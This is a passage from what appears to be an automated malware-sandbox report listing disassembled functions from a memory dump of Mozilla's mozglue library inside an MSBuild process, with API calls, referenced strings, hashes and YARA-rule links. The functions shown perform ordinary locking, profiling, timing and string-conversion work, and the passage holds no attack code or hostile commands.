                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD53F
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD55F
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8DD585
                                                                                                                                                                                                                      • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C8DD5D3
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD5F9
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD605
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD652
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD658
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD667
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD6A2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2206442479-0
                                                                                                                                                                                                                      • Opcode ID: ac08256de25291b3e0a510eaf174e345cf01c379b87643d1094a008fdd181e3d
                                                                                                                                                                                                                      • Instruction ID: 7711c6a84ab6deff3b512591b8dc9d60a1399b4c91881cd487505bdca2a74853
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac08256de25291b3e0a510eaf174e345cf01c379b87643d1094a008fdd181e3d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4517BB1608705EFC714DF24C884A9ABBF4FF89318F108A2EE95A87710DB30B945CB91
                                                                                                                                                                                                                      Function 6C8A5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C8A56D1
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8A56E9
                                                                                                                                                                                                                      • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C8A56F1
                                                                                                                                                                                                                      • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C8A5744
                                                                                                                                                                                                                      • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C8A57BC
                                                                                                                                                                                                                      • GetTickCount64.KERNEL32 ref: 6C8A58CB
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F688), ref: 6C8A58F3
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C8A5945
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F688), ref: 6C8A59B2
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C90F638,?,?,?,?), ref: 6C8A59E9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                      • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                      • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                      • Opcode ID: b9e0d65302947a66df8c443e6bde952bf151b1d416446227f92290126815f9cf
                                                                                                                                                                                                                      • Instruction ID: 3f94658266789ff416624943568912e334d3328f40e355d9194d95c49d7162c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b9e0d65302947a66df8c443e6bde952bf151b1d416446227f92290126815f9cf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7C1BE31A0C7449FCB15CF68C54066AB7F1FFCA718F158A2DE8C497620D730A986CB86
                                                                                                                                                                                                                      Function 6C8CEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEC84
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CEC8C
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CECA1
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CECAE
                                                                                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C8CECC5
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CED0A
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C8CED19
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C8CED28
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8CED2F
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CED59
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_ensure_started, xrefs: 6C8CEC94
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                      • API String ID: 4057186437-125001283
                                                                                                                                                                                                                      • Opcode ID: 858d58e2411142a716433d306473a2a0bd2ed8cc01c09aab164b8ca03fd50388
                                                                                                                                                                                                                      • Instruction ID: 89424b2c68e86a89b4ff060f063052b3325af1018362a23910afcc6f12017f4e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 858d58e2411142a716433d306473a2a0bd2ed8cc01c09aab164b8ca03fd50388
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 422135B1704108EBDB109F68D909A9A3779EF4632DF20462CFE1887B40DB34D805CBE6
                                                                                                                                                                                                                      Function 6C893A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockShared.KERNEL32 ref: 6C893BB4
                                                                                                                                                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6C893BD2
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32 ref: 6C893BE5
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32 ref: 6C893C91
                                                                                                                                                                                                                      • ReleaseSRWLockShared.KERNEL32 ref: 6C893CBD
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE ref: 6C893CF1
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1881024734-0
                                                                                                                                                                                                                      • Opcode ID: a0dc1bae3c25fd316a35793d8a6611ac8c2716c2bf52c4cce546e60fe22efed0
                                                                                                                                                                                                                      • Instruction ID: 71a378026fd17d1f54045540658eb2622f05156b3b1d29fc3ecfa2a242acc43d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a0dc1bae3c25fd316a35793d8a6611ac8c2716c2bf52c4cce546e60fe22efed0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DC140B5A09B05CFC724DF28C18465AFBF1BF89308F158A6ED8994BB11D731E885CB81
                                                                                                                                                                                                                      Function 6C8C8ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C88EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C88EB83
                                                                                                                                                                                                                      • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C8CB392,?,?,00000001), ref: 6C8C91F4
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                                                                      • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                                                                      • API String ID: 3790164461-3347204862
                                                                                                                                                                                                                      • Opcode ID: 4e88d80d39be69e951eb577f695a8f9d53d2c484d4b864f21c4a09aa4d3cee47
                                                                                                                                                                                                                      • Instruction ID: 47849f8cae49e54a4bfb71c4b640d761b33e16125e0f9c8a7537f310aea7c2c7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e88d80d39be69e951eb577f695a8f9d53d2c484d4b864f21c4a09aa4d3cee47
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EB1D3B1B012099BDB24CF98C691BAEBBB5BF85308F10482DD511ABF80D731E949CBD1
                                                                                                                                                                                                                      Function 6C8AC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8AC5A3
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32 ref: 6C8AC9EA
                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C8AC9FB
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C8ACA12
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8ACA2E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8ACAA5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                      • String ID: (null)$0
                                                                                                                                                                                                                      • API String ID: 4074790623-38302674
                                                                                                                                                                                                                      • Opcode ID: c588dffa8e5c2e6e0588286864f9fd948d3669b43284a714c41847b3b55c402f
                                                                                                                                                                                                                      • Instruction ID: bd3449a15db30b0f0519c38346d4bb7ecb7f6801105d2b2c476c1900587768f1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c588dffa8e5c2e6e0588286864f9fd948d3669b43284a714c41847b3b55c402f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4BA19D306083419FDB20DF68C64475ABBF1AF89748F148D2DE899D7652DB32EC06CB92
                                                                                                                                                                                                                      Function 6C8AC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C8AC784
                                                                                                                                                                                                                      • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8AC801
                                                                                                                                                                                                                      • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C8AC83D
                                                                                                                                                                                                                      • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C8AC891
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                                                                                                                      • String ID: INF$NAN$inf$nan
                                                                                                                                                                                                                      • API String ID: 1991403756-4166689840
                                                                                                                                                                                                                      • Opcode ID: 47c5156ee6d901cc323cf5e10bbd1ccf59085f3ff78685844df8367ebd015683
                                                                                                                                                                                                                      • Instruction ID: 19184cccc9fb9ff4954fb4dd7402ffcaf179bb2ef824ba85674ffe1f846040b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47c5156ee6d901cc323cf5e10bbd1ccf59085f3ff78685844df8367ebd015683
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC5180706087448BDB14DF6CC68169AFBF0BF8A348F008E2DE9D5A7651E771D986CB42
                                                                                                                                                                                                                      Function 6C883480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C883492
                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8834A9
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8834EF
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C88350E
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C883522
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C883552
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C88357C
                                                                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C883592
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 3634367004-706389432
                                                                                                                                                                                                                      • Opcode ID: d6365a81f92ab481a5b2987416d83ff775bae12ea005f8514ee03cf636ff2578
                                                                                                                                                                                                                      • Instruction ID: a06d2b76e8e71bb10dc59ad2bbfd7d16870521ea0e54db782c6a8fa1bcb7661b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6365a81f92ab481a5b2987416d83ff775bae12ea005f8514ee03cf636ff2578
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F319371B052099BDF14DFB9C958ABE77B5FB45308F20082DE505E3B90DB719A04CBA0
                                                                                                                                                                                                                      Function 6C884480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$moz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3009372454-0
                                                                                                                                                                                                                      • Opcode ID: 8b2441e360803dd404ce32cc0febbd5dd181fcf3645c03e51cbbbf8a91583dc9
                                                                                                                                                                                                                      • Instruction ID: 6040fd0efa0df0fe2ab5a687b96f17e7ec7fdf588a69204891743a4942d67b10
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b2441e360803dd404ce32cc0febbd5dd181fcf3645c03e51cbbbf8a91583dc9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38B1D573A025148FDB34DE6CDAF076D76A9AFC2328F584A39E416DBF86D73198408B41
                                                                                                                                                                                                                      Function 6C8EAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1192971331-0
                                                                                                                                                                                                                      • Opcode ID: 0a9d66895cf68844b96afcecc05da4bd437b98305848fb886ad25c203fe3d6c4
                                                                                                                                                                                                                      • Instruction ID: 183ccb7f40baf5c7b983a58e53e4cd0db88b61a26a45d61cb15f0beef34da514
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a9d66895cf68844b96afcecc05da4bd437b98305848fb886ad25c203fe3d6c4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA314EB1A087048FDB00AF7CD6486AEBBF1FF85705F114A2DE99597351EB709498CB82
                                                                                                                                                                                                                      Function 6C8BF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8BD9DB), ref: 6C8BF2D2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C8BF2F5
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C8BF386
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C8BF347
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C8BF3C8
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6C8BF3F3
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6C8BF3FC
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,00000000), ref: 6C8BF413
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
